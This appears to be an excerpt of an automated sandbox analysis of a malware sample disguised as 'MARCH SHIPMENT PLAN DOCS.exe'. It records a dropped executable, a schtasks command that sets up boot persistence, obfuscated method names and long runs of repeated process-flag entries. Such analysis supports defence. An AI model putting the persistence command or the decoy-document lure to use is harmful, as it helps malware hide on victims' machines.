              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, IkQsXfYsVdyp3uvAo1.csHigh entropy of concatenated method names: 't3ZlSoNuOt', 'OVdlk7QXpF', 'SxheEQRU8m', 'MsReD0LUaI', 'oFMeGPgQrt', 'qk4eiqFoRw', 'VCeeUAB9Vq', 'iOYeWVKlS4', 'z3JeyMjfqF', 'kroexm6t7X'
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeFile created: C:\Users\user\AppData\Roaming\PKjWaa.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
